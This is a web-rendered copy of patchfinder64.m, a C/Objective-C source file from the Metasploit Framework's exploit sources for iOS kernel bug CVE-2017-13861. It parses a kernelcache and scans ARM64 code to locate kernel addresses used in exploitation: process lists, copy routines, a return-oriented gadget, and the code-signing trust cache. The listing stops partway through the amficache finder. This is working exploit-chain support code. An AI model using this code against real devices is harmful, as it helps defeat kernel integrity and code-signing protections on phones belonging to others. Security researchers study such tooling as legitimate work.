CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/patchfinder64.m
Views: 11780
1
2
//
3
// patchfinder64.c
4
// extra_recipe
5
//
6
// Created by xerub on 06/06/2017.
7
// Copyright © 2017 xerub. All rights reserved.
8
//
9
10
#import <assert.h>
11
#import <stdint.h>
12
#import <string.h>
13
#import "kernel_utils.h"
14
15
typedef unsigned long long addr_t;
16
17
#define IS64(image) (*(uint8_t *)(image) & 1)
18
19
#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)
20
21
/* generic stuff *************************************************************/
22
23
#define UCHAR_MAX 255
24
25
static unsigned char *
26
Boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,
27
const unsigned char* needle, size_t nlen)
28
{
29
size_t last, scan = 0;
30
size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called:
31
* bad character shift */
32
33
/* Sanity checks on the parameters */
34
if (nlen <= 0 || !haystack || !needle)
35
return NULL;
36
37
/* ---- Preprocess ---- */
38
/* Initialize the table to default value */
39
/* When a character is encountered that does not occur
40
* in the needle, we can safely skip ahead for the whole
41
* length of the needle.
42
*/
43
for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1)
44
bad_char_skip[scan] = nlen;
45
46
/* C arrays have the first byte at [0], therefore:
47
* [nlen - 1] is the last byte of the array. */
48
last = nlen - 1;
49
50
/* Then populate it with the analysis of the needle */
51
for (scan = 0; scan < last; scan = scan + 1)
52
bad_char_skip[needle[scan]] = last - scan;
53
54
/* ---- Do the matching ---- */
55
56
/* Search the haystack, while the needle can still be within it. */
57
while (hlen >= nlen)
58
{
59
/* scan from the end of the needle */
60
for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1)
61
if (scan == 0) /* If the first byte matches, we've found it. */
62
return (void *)haystack;
63
64
/* otherwise, we need to skip some bytes and start again.
65
Note that here we are getting the skip value based on the last byte
66
of needle, no matter where we didn't match. So if needle is: "abcd"
67
then we are skipping based on 'd' and that value will be 4, and
68
for "abcdd" we again skip on 'd' but the value will be only 1.
69
The alternative of pretending that the mismatched character was
70
the last character is slower in the normal case (E.g. finding
71
"abcd" in "...azcd..." gives 4 by using 'd' but only
72
4-2==2 using 'z'. */
73
hlen -= bad_char_skip[haystack[last]];
74
haystack += bad_char_skip[haystack[last]];
75
}
76
77
return NULL;
78
}
79
80
/* disassembler **************************************************************/
81
82
static int HighestSetBit(int N, uint32_t imm)
83
{
84
int i;
85
for (i = N - 1; i >= 0; i--) {
86
if (imm & (1 << i)) {
87
return i;
88
}
89
}
90
return -1;
91
}
92
93
static uint64_t ZeroExtendOnes(unsigned M, unsigned N) // zero extend M ones to N width
94
{
95
(void)N;
96
return ((uint64_t)1 << M) - 1;
97
}
98
99
static uint64_t RORZeroExtendOnes(unsigned M, unsigned N, unsigned R)
100
{
101
uint64_t val = ZeroExtendOnes(M, N);
102
if (R == 0) {
103
return val;
104
}
105
return ((val >> R) & (((uint64_t)1 << (N - R)) - 1)) | ((val & (((uint64_t)1 << R) - 1)) << (N - R));
106
}
107
108
static uint64_t Replicate(uint64_t val, unsigned bits)
109
{
110
uint64_t ret = val;
111
unsigned shift;
112
for (shift = bits; shift < 64; shift += bits) { // XXX actually, it is either 32 or 64
113
ret |= (val << shift);
114
}
115
return ret;
116
}
117
118
static int DecodeBitMasks(unsigned immN, unsigned imms, unsigned immr, int immediate, uint64_t *newval)
119
{
120
unsigned levels, S, R, esize;
121
int len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F));
122
if (len < 1) {
123
return -1;
124
}
125
levels = ZeroExtendOnes(len, 6);
126
if (immediate && (imms & levels) == levels) {
127
return -1;
128
}
129
S = imms & levels;
130
R = immr & levels;
131
esize = 1 << len;
132
*newval = Replicate(RORZeroExtendOnes(S + 1, esize, R), esize);
133
return 0;
134
}
135
136
static int DecodeMov(uint32_t opcode, uint64_t total, int first, uint64_t *newval)
137
{
138
unsigned o = (opcode >> 29) & 3;
139
unsigned k = (opcode >> 23) & 0x3F;
140
unsigned rn, rd;
141
uint64_t i;
142
143
if (k == 0x24 && o == 1) { // MOV (bitmask imm) <=> ORR (immediate)
144
unsigned s = (opcode >> 31) & 1;
145
unsigned N = (opcode >> 22) & 1;
146
if (s == 0 && N != 0) {
147
return -1;
148
}
149
rn = (opcode >> 5) & 0x1F;
150
if (rn == 31) {
151
unsigned imms = (opcode >> 10) & 0x3F;
152
unsigned immr = (opcode >> 16) & 0x3F;
153
return DecodeBitMasks(N, imms, immr, 1, newval);
154
}
155
} else if (k == 0x25) { // MOVN/MOVZ/MOVK
156
unsigned s = (opcode >> 31) & 1;
157
unsigned h = (opcode >> 21) & 3;
158
if (s == 0 && h > 1) {
159
return -1;
160
}
161
i = (opcode >> 5) & 0xFFFF;
162
h *= 16;
163
i <<= h;
164
if (o == 0) { // MOVN
165
*newval = ~i;
166
return 0;
167
} else if (o == 2) { // MOVZ
168
*newval = i;
169
return 0;
170
} else if (o == 3 && !first) { // MOVK
171
*newval = (total & ~((uint64_t)0xFFFF << h)) | i;
172
return 0;
173
}
174
} else if ((k | 1) == 0x23 && !first) { // ADD (immediate)
175
unsigned h = (opcode >> 22) & 3;
176
if (h > 1) {
177
return -1;
178
}
179
rd = opcode & 0x1F;
180
rn = (opcode >> 5) & 0x1F;
181
if (rd != rn) {
182
return -1;
183
}
184
i = (opcode >> 10) & 0xFFF;
185
h *= 12;
186
i <<= h;
187
if (o & 2) { // SUB
188
*newval = total - i;
189
return 0;
190
} else { // ADD
191
*newval = total + i;
192
return 0;
193
}
194
}
195
196
return -1;
197
}
198
199
/* patchfinder ***************************************************************/
200
201
static addr_t
202
Step64(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)
203
{
204
addr_t end = start + length;
205
while (start < end) {
206
uint32_t x = *(uint32_t *)(buf + start);
207
if ((x & mask) == what) {
208
return start;
209
}
210
start += 4;
211
}
212
return 0;
213
}
214
215
// str8 = Step64_back(Kernel, ref, ref - bof, INSN_STR8);
216
static addr_t
217
Step64_back(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)
218
{
219
addr_t end = start - length;
220
while (start >= end) {
221
uint32_t x = *(uint32_t *)(buf + start);
222
if ((x & mask) == what) {
223
return start;
224
}
225
start -= 4;
226
}
227
return 0;
228
}
229
230
// Finds start of function
231
static addr_t
232
BOF64(const uint8_t *buf, addr_t start, addr_t where)
233
{
234
for (; where >= start; where -= 4) {
235
uint32_t op = *(uint32_t *)(buf + where);
236
if ((op & 0xFFC003FF) == 0x910003FD) {
237
unsigned delta = (op >> 10) & 0xFFF;
238
//printf("%x: ADD X29, SP, #0x%x\n", where, delta);
239
if ((delta & 0xF) == 0) {
240
addr_t prev = where - ((delta >> 4) + 1) * 4;
241
uint32_t au = *(uint32_t *)(buf + prev);
242
if ((au & 0xFFC003E0) == 0xA98003E0) {
243
//printf("%x: STP x, y, [SP,#-imm]!\n", prev);
244
return prev;
245
}
246
}
247
}
248
}
249
return 0;
250
}
251
252
static addr_t
253
xref64(const uint8_t *buf, addr_t start, addr_t end, addr_t what)
254
{
255
addr_t i;
256
uint64_t value[32];
257
258
memset(value, 0, sizeof(value));
259
260
end &= ~3;
261
for (i = start & ~3; i < end; i += 4) {
262
uint32_t op = *(uint32_t *)(buf + i);
263
unsigned reg = op & 0x1F;
264
if ((op & 0x9F000000) == 0x90000000) {
265
signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
266
//printf("%llx: ADRP X%d, 0x%llx\n", i, reg, ((long long)adr << 1) + (i & ~0xFFF));
267
value[reg] = ((long long)adr << 1) + (i & ~0xFFF);
268
/*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {
269
unsigned rd = op & 0x1F;
270
unsigned rm = (op >> 16) & 0x1F;
271
//printf("%llx: MOV X%d, X%d\n", i, rd, rm);
272
value[rd] = value[rm];*/
273
} else if ((op & 0xFF000000) == 0x91000000) {
274
unsigned rn = (op >> 5) & 0x1F;
275
unsigned shift = (op >> 22) & 3;
276
unsigned imm = (op >> 10) & 0xFFF;
277
if (shift == 1) {
278
imm <<= 12;
279
} else {
280
//assert(shift == 0);
281
if (shift > 1) continue;
282
}
283
//printf("%llx: ADD X%d, X%d, 0x%x\n", i, reg, rn, imm);
284
value[reg] = value[rn] + imm;
285
} else if ((op & 0xF9C00000) == 0xF9400000) {
286
unsigned rn = (op >> 5) & 0x1F;
287
unsigned imm = ((op >> 10) & 0xFFF) << 3;
288
//printf("%llx: LDR X%d, [X%d, 0x%x]\n", i, reg, rn, imm);
289
if (!imm) continue; // XXX not counted as true xref
290
value[reg] = value[rn] + imm; // XXX address, not actual value
291
/*} else if ((op & 0xF9C00000) == 0xF9000000) {
292
unsigned rn = (op >> 5) & 0x1F;
293
unsigned imm = ((op >> 10) & 0xFFF) << 3;
294
//printf("%llx: STR X%d, [X%d, 0x%x]\n", i, reg, rn, imm);
295
if (!imm) continue; // XXX not counted as true xref
296
value[rn] = value[rn] + imm; // XXX address, not actual value*/
297
} else if ((op & 0x9F000000) == 0x10000000) {
298
signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
299
//printf("%llx: ADR X%d, 0x%llx\n", i, reg, ((long long)adr >> 11) + i);
300
value[reg] = ((long long)adr >> 11) + i;
301
} else if ((op & 0xFF000000) == 0x58000000) {
302
unsigned adr = (op & 0xFFFFE0) >> 3;
303
//printf("%llx: LDR X%d, =0x%llx\n", i, reg, adr + i);
304
value[reg] = adr + i; // XXX address, not actual value
305
}
306
if (value[reg] == what) {
307
return i;
308
}
309
}
310
return 0;
311
}
312
313
static addr_t
314
Calc64(const uint8_t *buf, addr_t start, addr_t end, int which)
315
{
316
addr_t i;
317
uint64_t value[32];
318
319
memset(value, 0, sizeof(value));
320
321
end &= ~3;
322
for (i = start & ~3; i < end; i += 4) {
323
uint32_t op = *(uint32_t *)(buf + i);
324
unsigned reg = op & 0x1F;
325
if ((op & 0x9F000000) == 0x90000000) {
326
signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
327
//printf("%llx: ADRP X%d, 0x%llx\n", i, reg, ((long long)adr << 1) + (i & ~0xFFF));
328
value[reg] = ((long long)adr << 1) + (i & ~0xFFF);
329
/*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {
330
unsigned rd = op & 0x1F;
331
unsigned rm = (op >> 16) & 0x1F;
332
//printf("%llx: MOV X%d, X%d\n", i, rd, rm);
333
value[rd] = value[rm];*/
334
} else if ((op & 0xFF000000) == 0x91000000) {
335
unsigned rn = (op >> 5) & 0x1F;
336
unsigned shift = (op >> 22) & 3;
337
unsigned imm = (op >> 10) & 0xFFF;
338
if (shift == 1) {
339
imm <<= 12;
340
} else {
341
//assert(shift == 0);
342
if (shift > 1) continue;
343
}
344
//printf("%llx: ADD X%d, X%d, 0x%x\n", i, reg, rn, imm);
345
value[reg] = value[rn] + imm;
346
} else if ((op & 0xF9C00000) == 0xF9400000) {
347
unsigned rn = (op >> 5) & 0x1F;
348
unsigned imm = ((op >> 10) & 0xFFF) << 3;
349
//printf("%llx: LDR X%d, [X%d, 0x%x]\n", i, reg, rn, imm);
350
if (!imm) continue; // XXX not counted as true xref
351
value[reg] = value[rn] + imm; // XXX address, not actual value
352
} else if ((op & 0xF9C00000) == 0xF9000000) {
353
unsigned rn = (op >> 5) & 0x1F;
354
unsigned imm = ((op >> 10) & 0xFFF) << 3;
355
//printf("%llx: STR X%d, [X%d, 0x%x]\n", i, reg, rn, imm);
356
if (!imm) continue; // XXX not counted as true xref
357
value[rn] = value[rn] + imm; // XXX address, not actual value
358
} else if ((op & 0x9F000000) == 0x10000000) {
359
signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
360
//printf("%llx: ADR X%d, 0x%llx\n", i, reg, ((long long)adr >> 11) + i);
361
value[reg] = ((long long)adr >> 11) + i;
362
} else if ((op & 0xFF000000) == 0x58000000) {
363
unsigned adr = (op & 0xFFFFE0) >> 3;
364
//printf("%llx: LDR X%d, =0x%llx\n", i, reg, adr + i);
365
value[reg] = adr + i; // XXX address, not actual value
366
}
367
}
368
return value[which];
369
}
370
371
static addr_t
372
Calc64mov(const uint8_t *buf, addr_t start, addr_t end, int which)
373
{
374
addr_t i;
375
uint64_t value[32];
376
377
memset(value, 0, sizeof(value));
378
379
end &= ~3;
380
for (i = start & ~3; i < end; i += 4) {
381
uint32_t op = *(uint32_t *)(buf + i);
382
unsigned reg = op & 0x1F;
383
uint64_t newval;
384
int rv = DecodeMov(op, value[reg], 0, &newval);
385
if (rv == 0) {
386
if (((op >> 31) & 1) == 0) {
387
newval &= 0xFFFFFFFF;
388
}
389
value[reg] = newval;
390
}
391
}
392
return value[which];
393
}
394
395
static addr_t
396
Find_call64(const uint8_t *buf, addr_t start, size_t length)
397
{
398
return Step64(buf, start, length, 0x94000000, 0xFC000000);
399
}
400
401
static addr_t
402
Follow_call64(const uint8_t *buf, addr_t call)
403
{
404
long long w;
405
w = *(uint32_t *)(buf + call) & 0x3FFFFFF;
406
w <<= 64 - 26;
407
w >>= 64 - 26 - 2;
408
return call + w;
409
}
410
411
static addr_t
412
Follow_cbz(const uint8_t *buf, addr_t cbz)
413
{
414
return cbz + ((*(int *)(buf + cbz) & 0x3FFFFE0) << 10 >> 13);
415
}
416
417
/* kernel iOS10 **************************************************************/
418
419
#import <fcntl.h>
420
#import <stdio.h>
421
#import <stdlib.h>
422
#import <unistd.h>
423
#import <mach-o/loader.h>
424
425
//#define __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
426
427
#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
428
#import <mach/mach.h>
429
size_t KernelRead(uint64_t where, void *p, size_t size);
430
#endif
431
432
static uint8_t *Kernel = NULL;
433
static size_t Kernel_size = 0;
434
435
static addr_t XNUCore_Base = 0;
436
static addr_t XNUCore_Size = 0;
437
static addr_t Prelink_Base = 0;
438
static addr_t Prelink_Size = 0;
439
static addr_t CString_base = 0;
440
static addr_t CString_size = 0;
441
static addr_t PString_base = 0;
442
static addr_t PString_size = 0;
443
static addr_t KernDumpBase = -1;
444
static addr_t Kernel_entry = 0;
445
static void *Kernel_mh = 0;
446
static addr_t Kernel_delta = 0;
447
448
int
449
InitPatchfinder(addr_t base, const char *filename)
450
{
451
size_t rv;
452
uint8_t buf[0x4000];
453
unsigned i, j;
454
const struct mach_header *hdr = (struct mach_header *)buf;
455
const uint8_t *q;
456
addr_t min = -1;
457
addr_t max = 0;
458
int is64 = 0;
459
460
#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
461
#define close(f)
462
rv = KernelRead(base, buf, sizeof(buf));
463
if (rv != sizeof(buf)) {
464
return -1;
465
}
466
#else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
467
int fd = open(filename, O_RDONLY);
468
if (fd < 0) {
469
return -1;
470
}
471
472
rv = read(fd, buf, sizeof(buf));
473
if (rv != sizeof(buf)) {
474
close(fd);
475
return -1;
476
}
477
#endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
478
479
if (!MACHO(buf)) {
480
close(fd);
481
return -1;
482
}
483
484
if (IS64(buf)) {
485
is64 = 4;
486
}
487
488
q = buf + sizeof(struct mach_header) + is64;
489
for (i = 0; i < hdr->ncmds; i++) {
490
const struct load_command *cmd = (struct load_command *)q;
491
if (cmd->cmd == LC_SEGMENT_64) {
492
const struct segment_command_64 *seg = (struct segment_command_64 *)q;
493
if (min > seg->vmaddr) {
494
min = seg->vmaddr;
495
}
496
if (max < seg->vmaddr + seg->vmsize) {
497
max = seg->vmaddr + seg->vmsize;
498
}
499
if (!strcmp(seg->segname, "__TEXT_EXEC")) {
500
XNUCore_Base = seg->vmaddr;
501
XNUCore_Size = seg->filesize;
502
}
503
if (!strcmp(seg->segname, "__PLK_TEXT_EXEC")) {
504
Prelink_Base = seg->vmaddr;
505
Prelink_Size = seg->filesize;
506
}
507
if (!strcmp(seg->segname, "__TEXT")) {
508
const struct section_64 *sec = (struct section_64 *)(seg + 1);
509
for (j = 0; j < seg->nsects; j++) {
510
if (!strcmp(sec[j].sectname, "__cstring")) {
511
CString_base = sec[j].addr;
512
CString_size = sec[j].size;
513
}
514
}
515
}
516
if (!strcmp(seg->segname, "__PRELINK_TEXT")) {
517
const struct section_64 *sec = (struct section_64 *)(seg + 1);
518
for (j = 0; j < seg->nsects; j++) {
519
if (!strcmp(sec[j].sectname, "__text")) {
520
PString_base = sec[j].addr;
521
PString_size = sec[j].size;
522
}
523
}
524
}
525
if (!strcmp(seg->segname, "__LINKEDIT")) {
526
Kernel_delta = seg->vmaddr - min - seg->fileoff;
527
}
528
}
529
if (cmd->cmd == LC_UNIXTHREAD) {
530
uint32_t *ptr = (uint32_t *)(cmd + 1);
531
uint32_t flavor = ptr[0];
532
struct {
533
uint64_t x[29]; /* General purpose registers x0-x28 */
534
uint64_t fp; /* Frame pointer x29 */
535
uint64_t lr; /* Link register x30 */
536
uint64_t sp; /* Stack pointer x31 */
537
uint64_t pc; /* Program counter */
538
uint32_t cpsr; /* Current program status register */
539
} *thread = (void *)(ptr + 2);
540
if (flavor == 6) {
541
Kernel_entry = thread->pc;
542
}
543
}
544
q = q + cmd->cmdsize;
545
}
546
547
KernDumpBase = min;
548
XNUCore_Base -= KernDumpBase;
549
Prelink_Base -= KernDumpBase;
550
CString_base -= KernDumpBase;
551
PString_base -= KernDumpBase;
552
Kernel_size = max - min;
553
554
#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
555
Kernel = malloc(Kernel_size);
556
if (!Kernel) {
557
return -1;
558
}
559
rv = KernelRead(KernDumpBase, Kernel, Kernel_size);
560
if (rv != Kernel_size) {
561
free(Kernel);
562
return -1;
563
}
564
565
Kernel_mh = Kernel + base - min;
566
567
(void)filename;
568
#undef close
569
#else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
570
Kernel = calloc(1, Kernel_size);
571
if (!Kernel) {
572
close(fd);
573
return -1;
574
}
575
576
q = buf + sizeof(struct mach_header) + is64;
577
for (i = 0; i < hdr->ncmds; i++) {
578
const struct load_command *cmd = (struct load_command *)q;
579
if (cmd->cmd == LC_SEGMENT_64) {
580
const struct segment_command_64 *seg = (struct segment_command_64 *)q;
581
size_t sz = pread(fd, Kernel + seg->vmaddr - min, seg->filesize, seg->fileoff);
582
if (sz != seg->filesize) {
583
close(fd);
584
free(Kernel);
585
return -1;
586
}
587
if (!Kernel_mh) {
588
Kernel_mh = Kernel + seg->vmaddr - min;
589
}
590
printf("%s\n", seg->segname);
591
if (!strcmp(seg->segname, "__LINKEDIT")) {
592
Kernel_delta = seg->vmaddr - min - seg->fileoff;
593
}
594
}
595
q = q + cmd->cmdsize;
596
}
597
598
close(fd);
599
600
(void)base;
601
#endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
602
return 0;
603
}
604
605
void
606
TermPatchfinder(void)
607
{
608
free(Kernel);
609
}
610
611
/* these operate on VA ******************************************************/
612
613
#define INSN_RET 0xD65F03C0, 0xFFFFFFFF
614
#define INSN_CALL 0x94000000, 0xFC000000
615
#define INSN_B 0x14000000, 0xFC000000
616
#define INSN_CBZ 0x34000000, 0xFC000000
617
#define INSN_ADRP 0x90000000, 0x9F000000
618
619
#define INSN_STR8 0xF9000000 | 8, 0xFFC00000 | 0x1F
620
621
addr_t
622
Find_register_value(addr_t where, int reg)
623
{
624
addr_t val;
625
addr_t bof = 0;
626
where -= KernDumpBase;
627
if (where > XNUCore_Base) {
628
bof = BOF64(Kernel, XNUCore_Base, where);
629
if (!bof) {
630
bof = XNUCore_Base;
631
}
632
} else if (where > Prelink_Base) {
633
bof = BOF64(Kernel, Prelink_Base, where);
634
if (!bof) {
635
bof = Prelink_Base;
636
}
637
}
638
val = Calc64(Kernel, bof, where, reg);
639
if (!val) {
640
return 0;
641
}
642
return val + KernDumpBase;
643
}
644
645
addr_t
646
Find_reference(addr_t to, int n, int prelink)
647
{
648
addr_t ref, end;
649
addr_t base = XNUCore_Base;
650
addr_t size = XNUCore_Size;
651
if (prelink) {
652
base = Prelink_Base;
653
size = Prelink_Size;
654
}
655
if (n <= 0) {
656
n = 1;
657
}
658
end = base + size;
659
to -= KernDumpBase;
660
do {
661
ref = xref64(Kernel, base, end, to);
662
if (!ref) {
663
return 0;
664
}
665
base = ref + 4;
666
} while (--n > 0);
667
return ref + KernDumpBase;
668
}
669
670
addr_t
671
Find_strref(const char *string, int n, int prelink)
672
{
673
uint8_t *str;
674
addr_t base = CString_base;
675
addr_t size = CString_size;
676
if (prelink) {
677
base = PString_base;
678
size = PString_size;
679
}
680
str = Boyermoore_horspool_memmem(Kernel + base, size, (uint8_t *)string, strlen(string));
681
if (!str) {
682
return 0;
683
}
684
return Find_reference(str - Kernel + KernDumpBase, n, prelink);
685
}
686
687
/****** fun *******/
688
689
addr_t Find_add_x0_x0_0x40_ret(void) {
690
addr_t off;
691
uint32_t *k;
692
k = (uint32_t *)(Kernel + XNUCore_Base);
693
for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {
694
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
695
return off + XNUCore_Base + KernDumpBase;
696
}
697
}
698
k = (uint32_t *)(Kernel + Prelink_Base);
699
for (off = 0; off < Prelink_Size - 4; off += 4, k++) {
700
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
701
return off + Prelink_Base + KernDumpBase;
702
}
703
}
704
return 0;
705
}
706
707
708
uint64_t Find_allproc_10(void)
709
{
710
addr_t val, bof, str8;
711
addr_t ref = Find_strref("\"pgrp_add : pgrp is dead adding process\"", 1, 0);
712
if (!ref) {
713
return 0;
714
}
715
ref -= KernDumpBase;
716
bof = BOF64(Kernel, XNUCore_Base, ref);
717
if (!bof) {
718
return 0;
719
}
720
str8 = Step64_back(Kernel, ref, ref - bof, INSN_STR8);
721
if (!str8) {
722
return 0;
723
}
724
val = Calc64(Kernel, bof, str8, 8);
725
if (!val) {
726
return 0;
727
}
728
return val + KernDumpBase;
729
}
730
731
uint64_t Find_allproc_11(void) {
732
// Find the first reference to the string
733
addr_t ref = Find_strref("\"pgrp_add : pgrp is dead adding process\"", 1, 0);
734
if (!ref) {
735
return 0;
736
}
737
ref -= KernDumpBase;
738
739
uint64_t start = BOF64(Kernel, XNUCore_Base, ref);
740
if (!start) {
741
return 0;
742
}
743
744
// Find AND W8, W8, #0xFFFFDFFF - it's a pretty distinct instruction
745
addr_t weird_instruction = 0;
746
for (int i = 4; i < 4*0x100; i+=4) {
747
uint32_t op = *(uint32_t *)(Kernel + ref + i);
748
if (op == 0x12127908) {
749
weird_instruction = ref+i;
750
break;
751
}
752
}
753
if (!weird_instruction) {
754
return 0;
755
}
756
757
uint64_t val = Calc64(Kernel, start, weird_instruction - 8, 8);
758
if (!val) {
759
printf("Failed to calculate x8");
760
return 0;
761
}
762
763
return val + KernDumpBase;
764
}
765
766
767
uint64_t Find_allproc(void)
768
{
769
addr_t val = Find_allproc_10();
770
if (val) {
771
return val;
772
}
773
return Find_allproc_11();
774
}
775
776
uint64_t Find_copyout(void) {
777
// Find the first reference to the string
778
addr_t ref = Find_strref("\"%s(%p, %p, %lu) - transfer too large\"", 2, 0);
779
if (!ref) {
780
return 0;
781
}
782
ref -= KernDumpBase;
783
784
uint64_t start = 0;
785
for (int i = 4; i < 0x100*4; i+=4) {
786
uint32_t op = *(uint32_t*)(Kernel+ref-i);
787
if (op == 0xd10143ff) { // SUB SP, SP, #0x50
788
start = ref-i;
789
break;
790
}
791
}
792
if (!start) {
793
return 0;
794
}
795
796
return start + KernDumpBase;
797
}
798
799
uint64_t Find_bzero(void) {
800
// Just find SYS #3, c7, c4, #1, X3, then get the start of that function
801
addr_t off;
802
uint32_t *k;
803
k = (uint32_t *)(Kernel + XNUCore_Base);
804
for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {
805
if (k[0] == 0xd50b7423) {
806
off += XNUCore_Base;
807
break;
808
}
809
}
810
811
uint64_t start = BOF64(Kernel, XNUCore_Base, off);
812
if (!start) {
813
return 0;
814
}
815
816
return start + KernDumpBase;
817
}
818
819
addr_t Find_bcopy(void) {
820
// Jumps straight into memmove after switching x0 and x1 around
821
// Guess we just find the switch and that's it
822
addr_t off;
823
uint32_t *k;
824
k = (uint32_t *)(Kernel + XNUCore_Base);
825
for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {
826
if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {
827
return off + XNUCore_Base + KernDumpBase;
828
}
829
}
830
k = (uint32_t *)(Kernel + Prelink_Base);
831
for (off = 0; off < Prelink_Size - 4; off += 4, k++) {
832
if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {
833
return off + Prelink_Base + KernDumpBase;
834
}
835
}
836
return 0;
837
}
838
839
uint64_t Find_rootvnode(void) {
840
// Find the first reference to the string
841
addr_t ref = Find_strref("/var/run/.vfs_rsrc_streams_%p%x", 1, 0);
842
if (!ref) {
843
return 0;
844
}
845
ref -= KernDumpBase;
846
847
uint64_t start = BOF64(Kernel, XNUCore_Base, ref);
848
if (!start) {
849
return 0;
850
}
851
852
// Find MOV X9, #0x2000000000 - it's a pretty distinct instruction
853
addr_t weird_instruction = 0;
854
for (int i = 4; i < 4*0x100; i+=4) {
855
uint32_t op = *(uint32_t *)(Kernel + ref - i);
856
if (op == 0xB25B03E9) {
857
weird_instruction = ref-i;
858
break;
859
}
860
}
861
if (!weird_instruction) {
862
return 0;
863
}
864
865
uint64_t val = Calc64(Kernel, start, weird_instruction, 8);
866
if (!val) {
867
return 0;
868
}
869
870
return val + KernDumpBase;
871
}
872
873
874
addr_t Find_vnode_lookup() {
875
addr_t call, bof;
876
addr_t ref = Find_strref("/private/var/mobile", 0, 0);
877
if (!ref) {
878
return 0;
879
}
880
ref -= KernDumpBase;
881
bof = BOF64(Kernel, XNUCore_Base, ref);
882
if (!bof) {
883
return 0;
884
}
885
call = Step64(Kernel, ref, ref - bof, INSN_CALL);
886
if (!call) {
887
return 0;
888
}
889
call += 4;
890
call = Step64(Kernel, call, call - bof, INSN_CALL);
891
if (!call) {
892
return 0;
893
}
894
call += 4;
895
call = Step64(Kernel, call, call - bof, INSN_CALL);
896
if (!call) {
897
return 0;
898
}
899
return Follow_call64(Kernel, call) + KernDumpBase;
900
}
901
902
addr_t
903
Find_trustcache10_3_2()
904
{
905
addr_t call, func, val;
906
addr_t ref = Find_strref("com.apple.MobileFileIntegrity", 1, 1);
907
if (!ref) {
908
return 0;
909
}
910
ref -= KernDumpBase;
911
call = Step64(Kernel, ref, 32, INSN_CALL);
912
if (!call) {
913
return 0;
914
}
915
call = Step64(Kernel, call+4, 32, INSN_CALL);
916
func = Follow_call64(Kernel, call);
917
if (!func) {
918
return 0;
919
}
920
val = Calc64(Kernel, func, func + 16, 8);
921
if (!val) {
922
return 0;
923
}
924
return val + KernDumpBase;
925
}
926
927
addr_t
928
Find_trustcache()
929
{
930
addr_t cbz, call, func, val;
931
addr_t ref = Find_strref("amfi_prevent_old_entitled_platform_binaries", 1, 1);
932
if (!ref) {
933
return 0;
934
}
935
ref -= KernDumpBase;
936
cbz = Step64(Kernel, ref, 32, INSN_CBZ);
937
if (!cbz) {
938
return 0;
939
}
940
call = Step64(Kernel, Follow_cbz(Kernel, cbz), 4, INSN_CALL);
941
if (!call) {
942
return 0;
943
}
944
func = Follow_call64(Kernel, call);
945
if (!func) {
946
return 0;
947
}
948
val = Calc64(Kernel, func, func + 16, 8);
949
if (!val) {
950
return 0;
951
}
952
return val + KernDumpBase;
953
}
954
955
/*
956
addr_t Find_trustcache(void) {
957
addr_t call, func;
958
addr_t ref = Find_strref("%s: only allowed process can check the trust cache", 1, 1);
959
if (!ref) {
960
return 0;
961
}
962
ref -= KernDumpBase;
963
call = Step64_back(Kernel, ref, 44, INSN_CALL);
964
if (!call) {
965
return 0;
966
}
967
func = Follow_call64(Kernel, call);
968
if (!func) {
969
return 0;
970
}
971
call = Step64(Kernel, func, 32, INSN_CALL);
972
if (!call) {
973
return 0;
974
}
975
func = Follow_call64(Kernel, call);
976
if (!func) {
977
return 0;
978
}
979
call = Step64(Kernel, func, 32, INSN_CALL);
980
if (!call) {
981
return 0;
982
}
983
call = Step64(Kernel, call + 4, 32, INSN_CALL);
984
if (!call) {
985
return 0;
986
}
987
func = Follow_call64(Kernel, call);
988
if (!func) {
989
return 0;
990
}
991
call = Step64(Kernel, func, 48, INSN_CALL);
992
if (!call) {
993
return 0;
994
}
995
uint64_t val = Calc64(Kernel, call, call + 24, 21);
996
if (!val) {
997
// iOS 12
998
ref = Find_strref("\"loadable trust cache buffer too small (%ld) for entries claimed (%d)\"", 1, 0);
999
if (!ref) {
1000
return 0;
1001
}
1002
ref -= KernDumpBase;
1003
1004
val = Calc64(Kernel, ref-12*4, ref-12*4+12, 8);
1005
if (!val) {
1006
return 0;
1007
}
1008
return val + KernDumpBase;
1009
}
1010
return val + KernDumpBase;
1011
}
1012
*/
1013
1014
// people that worked in unc0ver. sparkey maybe?
1015
addr_t Find_amficache() {
1016
uint64_t cbz, call, func, val;
1017
